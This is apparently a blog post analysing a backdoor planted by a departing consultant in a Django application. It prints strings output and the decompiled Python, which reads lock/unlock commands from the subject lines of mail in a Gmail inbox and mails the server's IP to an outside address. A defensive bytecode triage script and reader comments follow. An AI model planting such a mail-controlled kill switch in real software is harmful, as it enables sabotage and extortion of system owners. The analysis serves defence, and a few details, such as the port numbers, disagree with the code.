[Your worst enemy: The rogue consultant/admin] py_util.pyc LOCK/UNLOCK backdoor over email

I recently had to do a fast forensic job for a friend. He asked me for help as he was taking over a business that had been "abandoned" by an "open source consultant", which is to say someone who installs everything on Linux and, in this case, does half the coding as well.

The problem arose as soon as they took over the network: within the hour a critical system for the business stopped working. This was more than suspicious, because another business that had also been administered by this person had files erased and configurations lost when it was transitioned to another admin, due to a lack of administration and ethics on the admin's part.

First I tried to decompile the Python files from the Django server; this was because obviously all the servers were blocked except for port 80. My friend innocently forgot to block all access to the internet, as he thought that was not that important (#FAIL), and he didn't really think this person (who, I now know, is consulting for a major bank in Mexico) would backdoor things and do this type of stuff.

The first thing was to run strings on it to figure out what was there (credentials and paths removed for security reasons):

fsckOSX:~ nahual$ strings py_util.pyc
EmailMultiAlternatives(
MIMEImage(
datetimeN(
Parsers
fxxxxxxxxxxo@gmail.comt
mxxxgyyczzt
LOCKSYSTEMt
UNLOCKSYSTEMt
GETIPs$
/home/xxxxxxx/svn/yyyyyyyy/.python.logc
pop.gmail.comi
Subjectt
bloqueandot
desbloqueandot8
2baa224d0a3515912218fd88c1dd9d90d347c451c67811ac6240f4a1(
poplibt
POP3_SSLt
usert
pass_t
passwdt
Exceptiont
lent
listt
ranget
retrt
joinR
parsestrt
LOCKt
opent
file_logt
writet
closet
UNLOCKR
check_ipt
quit(
errt
numerot
responset
headerLinest
bytest
mensajet
emailt
subjectt
/home/xxxxxxx/svn/yyyyyyy/../yyyyyyy/py_util.pyt
check_locker
setup_environ(
BeautifulSoups
hxxxxxxx3@gmail.comR

http://www.cualesmiip.comt

divt
miipt
IP del servidort
from_emails
text/html(
urllib2t
django.core.managementR/
xml.dom.minidomR0
settingst
urlopent
readt
findt
findAllR
DEFAULT_FROM_EMAILt
attach_alternativet
send(
xmlR0
listmailt
contentt
feedR&
html_contentR,
msg(
/home/xxxxxxx/svn/yyyyyy/../yyyyyy/py_util.pyR
__main__(
django.core.mailR
email.MIMEImageR
smtplibR
email.ParserR
__name__(
/home/xxxxxxxx/svn/yyyyyy/../yyyyy/py_util.pyt

fsckOSX:~ nahual$

py_util.pyc wouldn't decompile quickly, so after loading it into IDA and other decompilers this is what was found (credentials removed for security reasons):


from django.core.mail import EmailMultiAlternatives
from email.MIMEImage import MIMEImage
from datetime import datetime
import smtplib
import poplib
from email.Parser import Parser

# Credentials of the Gmail mailbox the backdoor polls (redacted by the author).
user = 'xxxxxx'
passwd = 'xxxxxxxx'
# Command words expected in the Subject header of incoming mail.
LOCK = 'LOCKSYSTEM'
UNLOCK = 'UNLOCKSYSTEM'
GETIP = 'GETIP'
# The file the LOCK/UNLOCK commands overwrite; per the author, emptying it shuts the application down.
file_log = '/home/xxxxx/svn/yyyyyy/.python.log'

def check_locker():
    # Log in to the mailbox over POP3 with SSL (port 995).
    try:
        m = poplib.POP3_SSL('pop.gmail.com', 995)
        m.user(user)
        m.pass_(passwd)
    except Exception, err:
        print err
    else:
        # Walk every message in the mailbox and act on its Subject header.
        numero = len(m.list()[1])
        for i in range(numero):
            (response, headerLines, bytes) = m.retr(i + 1)
            mensaje = '\n'.join(headerLines)
            p = Parser()
            email = p.parsestr(mensaje)
            subject = email['Subject']
            if (subject == LOCK):
                print 'bloqueando'  # "locking"
                f = open(file_log, 'w')
                f.write('')
                f.close()
            elif (subject == UNLOCK):
                print 'desbloqueando'  # "unlocking"
                f = open(file_log, 'w')
                f.write('xxxxxxxxxxxxx')
                f.close()
            elif (subject == GETIP):
                check_ip()
        m.quit()

def check_ip():
    import urllib2
    from django.core.management import setup_environ
    import xml.dom.minidom
    from BeautifulSoup import BeautifulSoup
    import settings
    setup_environ(settings)
    # Mail the server's public IP to the operator's address (redacted by the author).
    listmail = ['xxxxxxxx@gmail.com']
    content = ''
    # The strings output above shows http://www.cualesmiip.com as the site actually queried.
    feed = urllib2.urlopen('http://www.google.com')
    response = BeautifulSoup(feed.read())
    html_content = response.find('div', {'id': 'miip'}).findAll('b')[0]
    subject = 'IP del servidor'
    msg = EmailMultiAlternatives(subject, content, to=listmail, from_email=settings.DEFAULT_FROM_EMAIL)
    msg.attach_alternative(html_content, 'text/html')
    msg.send()

if (__name__ == '__main__'):
    check_ip()

As you can see the backdoor is pretty small and "efficient": it checks a Gmail account, and if an email with the subject LOCKSYSTEM is sent to that account it will automatically shut down the application; you can of course unlock the system with another email (UNLOCKSYSTEM).
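A host-side triage of the .pyc itself, as an added example that is not part of the original post: it unmarshals the code object, walks nested function bodies, and flags the combination of mail polling, file writes and LOCK/UNLOCK command words that the strings output and decompile above revealed. The sample module, the indicator sets and the temp-dir paths are constructed for this example; the loader assumes a Python 3.7+ .pyc written by the same interpreter.

```python
import marshal, os, py_compile, tempfile, types

# Indicator sets taken from the strings output and decompile of py_util.pyc above.
MAIL_POLLING = {"poplib", "POP3_SSL", "imaplib", "retr", "parsestr"}
FILE_TAMPER = {"open", "write"}
COMMAND_WORDS = {"LOCKSYSTEM", "UNLOCKSYSTEM", "GETIP"}

def load_code(pyc_path):
    # Assumes a .pyc written by this interpreter (16-byte header, Python 3.7+).
    with open(pyc_path, "rb") as fh:
        fh.seek(16)
        return marshal.load(fh)
def walk_code(code):
    # Yield the module code object and every nested function/class body.
    yield code
    for const in code.co_consts:
        if isinstance(const, types.CodeType):
            yield from walk_code(const)
def triage(pyc_path):
    # Collect referenced names and string constants, then match the indicator sets.
    names, strings = set(), set()
    for co in walk_code(load_code(pyc_path)):
        names.update(co.co_names)
        strings.update(c for c in co.co_consts if isinstance(c, str))
    report = {
        "mail_polling": sorted(MAIL_POLLING & (names | strings)),
        "file_tamper": sorted(FILE_TAMPER & names),
        "command_words": sorted(COMMAND_WORDS & strings),
    }
    # Flag only when mail polling, file writes and command words all co-occur.
    report["suspicious"] = all(report[k] for k in ("mail_polling", "file_tamper", "command_words"))
    return report

# Constructed stand-in for py_util.py: same indicators, but it never connects anywhere.
SAMPLE_SOURCE = """
import poplib
LOCK = 'LOCKSYSTEM'; UNLOCK = 'UNLOCKSYSTEM'
def check_locker(subject):
    client = poplib.POP3_SSL
    if subject == LOCK:
        f = open('/tmp/example.log', 'w'); f.write(''); f.close()
"""

def compile_sample():
    # Write the sample module to a temp dir and compile it to a real .pyc.
    workdir = tempfile.mkdtemp()
    src = os.path.join(workdir, "py_util.py")
    with open(src, "w") as fh:
        fh.write(SAMPLE_SOURCE)
    return py_compile.compile(src, cfile=os.path.join(workdir, "py_util.pyc"), doraise=True)
```

Point triage() at any .pyc under the web root to get the same report; unlike strings, it also catches names that only appear inside nested functions.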

Was this coded because they thought the client might not pay them? Why would he code something like this without the client's consent? No documentation was delivered with the code, and as soon as the admin/developer was let go the system was shut down within the hour. This sounds to me more like a blackmail function than a legitimate admin function, as it only turns the system off: no backups, nothing.

This makes me wonder why this would be created, or executed. I thought about writing a fast and ugly rule so that if anything like this happened again at least the Snort sensors would alert, and I told my friend to lock down the firewall rules, but this lack of ethics is overwhelming. I wonder what the bank would think of him being used to backdoor stuff to keep a foot in the door? jeeeeezzzzz

A Snort rule would not really work as it's doing POP3 over SSL, but then blocking port 993 should lock him out. Still ... why do people do this? Don't they understand this lack of ethics is preposterous?


4 Comments  to  [Your worst enemy: The rogue consultant/admin] py_util.pyc LOCK/UNLOCK backdoor over email

  1. zodman says:

    You should have posted it on gist.github.com so it displays better.

  2. depython.net didn't decompile it :P it only gave me a blank output :) interesting, no?

  3. Ivan Zenteno says:

    This is really interesting, because I don't know why the owner of the code did not make a claim to the public ministry.
    These people need a lesson in ethics.
